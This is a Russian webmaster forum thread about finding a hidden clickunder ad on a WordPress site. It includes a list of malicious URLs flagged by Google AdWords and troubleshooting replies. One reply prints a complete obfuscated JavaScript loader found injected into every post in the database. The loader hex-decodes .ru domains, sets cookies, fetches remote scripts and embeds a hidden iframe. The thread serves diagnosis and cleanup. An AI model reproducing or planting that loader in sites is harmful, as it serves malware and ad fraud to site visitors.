Скрытый кликандер на сайте / вирусы

K
На сайте с 08.09.2014
Offline
31
2273

Здравствуйте, прошу помощи у людей, которые сталкивались с проблемой вирусов/вредоносных ссылок/скриптов на сайте.

Есть сайт vivatstudio.com, сайт на вордпессе. Так вот походу с каким-то плагином или в самом сайте находится скрипт/фрейм который вызывает кликандер рекламу при первом нажатии по сайту. Если почистить кэш браузера, то снова сработает.

Перерыл уже весь сайт, никак не могу найти. Проверял антивирусником, который предоставляет хостинг, проверял яндексовским Munal, ни один не показывает что есть вирусы.:(

Может кто подскажет как его найти или где он вообще может спрятан?:confused::confused::confused:

P.S. еще служба поддержки из гугл эдвордс прислали список вредоносных ссылок, содержащихся на сайте:

http://app.bestpriceninja.com/fo/country.js
http://jsgnr.bestpriceninja.com/bwl/bl
http://jsgnr.bestpriceninja.com/bwl/wl
http://jsgnr.bestpriceninja.com/cu/cu
http://pstatic.bestpriceninja.com/nwp/External/NWPLegacy_v3.js?try=0
http://pstatic.bestpriceninja.com/nwp/External/bloomfilter.js?try=0
http://pstatic.bestpriceninja.com/nwp/External/jquery.dotdotdot.js?try=0
http://pstatic.bestpriceninja.com/nwp/External/jquery.xdr.js?try=0
http://pstatic.bestpriceninja.com/nwp/External/json3.js?try=0
http://pstatic.bestpriceninja.com/nwp/External/nlp_compromise.min.js?try=0
http://pstatic.bestpriceninja.com/nwp/v0_0_1101/release/Shared/App/SharedApp.js?t=0
http://pstatic.bestpriceninja.com/nwp/v0_0_1101/release/Shared/Extra/IFrameStoreReciever.js
http://pstatic.bestpriceninja.com/nwp/v0_0_1101/release/Store.html
http://rules.similardeals.net/v1.0/whitelist/1052/9648x1001/vivatstudio.com?partnerName=fastoplayer&partnerLink=http%3A%2F%2Fluu.lightquartrate.com%2Fsd%2Fapps%2Fadinfo-1.1%2Findex.html%3Fn%3Dfastoplayer%26oou%3Dhttp%3A%2F%2Fgpy.diminishingunvalidated.com%2Fopt_out%2F1%26w%3Dvivatstudio.com%26a%3D9648%26s%3D1001
http://xb11766.com/ctrd/click/newjump1.do?affiliate=66385&subid=9648_1001_us&terms=vivatstudio.com%20%D0%9E%D1%82%D0%B4%D0%B5%D0%BB%D0%BA%D0%B0%20%D0%B4%D0%B5%D0%BA%D0%BE%D1%80%D0%B0%D1%82%D0%B8%D0%B2%D0%BD%D0%BE%D0%B9%20%D1%88%D1%82%D1%83%D0%BA%D0%B0%D1%82%D1%83%D1%80%D0%BA%D0%BE%D0%B9%20Caparol%20San%20Marko%20Oikos%20%D0%B4%D0%B5%D0%BA%D0%BE%D1%80%D0%B0%D1%82%D0%B8%D0%B2%D0%BD%D0%B0%D1%8F%20%D1%88%D1%82%D1%83%D0%BA%D0%B0%D1%82%D1%83%D1%80%D0%BA%D0%B0%20%D0%B2%D0%B8%D0%B4%D1%8B%20%D0%B2%D0%B5%D0%BD%D0%B5%D1%86%D0%B8%D0%B0%D0%BD%D1%81%D0%BA%D0%B0%D1%8F&ai=j0_q0etDf2lCo4xaK1p4Oy8KEQVmYNq4ig0TevLr-Ztg_wfHUD_rgszrRhgkQHpVavv-HIiowWgJY6PAjjcfUW8lBr4bw6urC-Zh7uRMVwRB-zBlhE6vm7jBIgv9rr7VojWFuW-BItP6dCkmZQQl_Ry9k7v0gnRpF0iWPa8T19KvSfGY4dV3S3hsYr9kVmWcI0SIp-P6mYXQpjlYQX7zWMv4_6hR9CyUebg7aXf6e4DClF8xpcytaeEOOEnHapcPQHpu5y4t-GgoFDIowoAgix-q0Whh6yZLiU-pqJCiJq_IKUfLJuM-R3G1jofZPLQHab_HSLetgc-_d9cnWLmwUm1xLHKGRg2kLy-GiVi0Qx6uBacBgt58k83_h1XZoD1h09ptFIi6t6TgLdqnm4YNuRrnkyNs0GS7Az8RrHbQyb-rsP9I6fKA1J-RAYfj-BuGoNTK9ASJBptuQorXRFjiKaSXljujwtFnxigU0VthPXby5spHG6RI_2Xh8GeL1ahvqc7Ho3d0v3HRtzHo-z9L0iU6AchRu2vW14KSTz_M3HdBET81DO8F3Nehu6zWrQsVlifu96U9r7ZtbKP4ucm7UqgF2Cl0sr5fQL9JrZMcyCMaB-u-BAlXtg&passThruAttr=eventHandler%3Dbackcatcher
http://xb11766.com/favicon.ico

Но их я тоже не нашел в сайте:(

SeVlad
На сайте с 03.11.2008
Offline
1609
#1

Ещё крупнее напиши - точно поможет. 😡

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
C
На сайте с 26.10.2013
Offline
54
#2

Тема фришная? functions.php и сопутствующие смотрели на предмет загрузчиков?

Услуги по парсингу данных (/ru/forum/939826), единоразовый и регулярный сбор данных. Любые объемы. Скрипты на PHP, создание и доработка, решение проблем с сайтами Пишите в личные сообщения или скайп
K
На сайте с 08.09.2014
Offline
31
#3

colorito, тема стандартная Twenty Thirteen. Смотрел functions.php, но ничего там не нашел

C
На сайте с 26.10.2013
Offline
54
#4

Глянул сайт. Похоже, что вирусняк в БД. Вот эта хрень во всех записях

<p><script>// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21373",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("vivatstudio.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

// ]]&gt;</script><iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html"></iframe></p>

Посмотрите исходники всех текстов, возможно найдете. Если не получится - можете стукнуть в скайп, но это за пиво уже

Bond_007
На сайте с 11.10.2010
Offline
62
#5

Первым делом вырубайте все плагины, и проверяйте. если всплывет, значит проблема в дизе или в БД. Меняете диз - если проблема всплывет - значит что-то переписывает данные в БД. Это может быть скрипт, который вшился в исполняемые файлы самого ВП. Проделав эти манупуляции вы сможете определить локацию проблемы. Тогда уже можно ее решать.

LinkBoss.net - Трастовые ссылки для увеличения трафика в 10 раз! (http://linkboss.net/)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий